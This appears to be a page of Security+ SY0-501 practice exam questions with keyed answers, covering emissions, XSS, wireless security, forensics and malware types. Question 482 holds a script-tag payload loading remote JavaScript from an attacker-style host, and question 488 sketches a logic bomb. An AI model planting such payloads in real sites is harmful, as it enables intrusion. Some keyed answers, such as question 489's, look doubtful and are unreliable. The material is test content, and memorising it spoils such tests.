CompTIA Security+ SY0-501 Exam Questions and Answers – Page 5

The latest CompTIA Security+ (SY0-501) certification actual real practice exam question and answer (Q&A) dumps are available free, which are helpful for you to pass the CompTIA Security+ (SY0-501) exam and earn CompTIA Security+ (SY0-501) certification.

Exam Question 481

An organization is concerned about video emissions from users’ desktops. Which of the following is the BEST solution to implement?

A. Screen filters
B. Shielded cables
C. Spectrum analyzers
D. Infrared detection

Correct Answer:
A. Screen filters

Exam Question 482

A security engineer is analyzing the following line of JavaScript code that was found in a comment field on a web forum, which was recently involved in a security breach:
<script src=http://gotcha.com/hackme.js></script>
Given the line of code above, which of the following BEST represents the attack performed during the breach?

A. CSRF
B. DDoS
C. DoS
D. XSS

Correct Answer:
D. XSS

Exam Question 483

Which of the following serves to warn users against downloading and installing pirated software on company devices?

A. AUP
B. NDA
C. ISA
D. BPA

Correct Answer:
A. AUP

Exam Question 484

An organization wants to set up a wireless network in the most secure way. Budget is not a major consideration, and the organization is willing to accept some complexity when clients are connecting. It is also willing to deny wireless connectivity for clients who cannot be connected in the most secure manner.
Which of the following would be the MOST secure setup that conforms to the organization’s requirements?

A. Enable WPA2-PSK for older clients and WPA2-Enterprise for all other clients.
B. Enable WPA2-PSK, disable all other modes, and implement MAC filtering along with port security.
C. Use WPA2-Enterprise with RADIUS and disable pre-shared keys.
D. Use WPA2-PSK with a 24-character complex password and change the password monthly.

Correct Answer:
C. Use WPA2-Enterprise with RADIUS and disable pre-shared keys.

Exam Question 485

A first responder needs to collect digital evidence from a compromised headless virtual host. Which of the following should the first responder collect FIRST?

A. Virtual memory
B. BIOS configuration
C. Snapshot
D. RAM

Correct Answer:
C. Snapshot

Exam Question 486

The exploitation of a buffer-overrun vulnerability in an application will MOST likely lead to:

A. arbitrary code execution.
B. resource exhaustion.
C. exposure of authentication credentials.
D. dereferencing of memory pointers.

Correct Answer:
A. arbitrary code execution.

Exam Question 487

A security professional wants to test a piece of malware that was isolated on a user’s computer to document its effect on a system. Which of the following is the FIRST step the security professional should take?

A. Create a sandbox on the machine.
B. Open the file and run it.
C. Create a secure baseline of the system state.
D. Harden the machine.

Correct Answer:
C. Create a secure baseline of the system state.

Exam Question 488

A security administrator found the following piece of code referenced on a domain controller’s task scheduler:
$var = GetDomainAdmins
If $var != ‘fabio’
SetDomainAdmins = NULL

With which of the following types of malware is the code associated?

A. RAT
B. Backdoor
C. Logic bomb
D. Crypto-malware

Correct Answer:
C. Logic bomb

Exam Question 489

An employee opens a web browser and types a URL into the address bar. Instead of reaching the requested site, the browser opens a completely different site. Which of the following types of attacks have MOST likely occurred? (Choose two.)

A. DNS hijacking
B. Cross-site scripting
C. Domain hijacking
D. Man-in-the-browser
E. Session hijacking

Correct Answer:
A. DNS hijacking
E. Session hijacking

Exam Question 490

A coding error has been discovered on a customer-facing website. The error causes each request to return confidential PHI data for the incorrect organization. The IT department is unable to identify the specific customers who are affected. As a result, all customers must be notified of the potential breach. Which of the following would allow the team to determine the scope of future incidents?

A. Intrusion detection system
B. Database access monitoring
C. Application fuzzing
D. Monthly vulnerability scans

Correct Answer:
B. Database access monitoring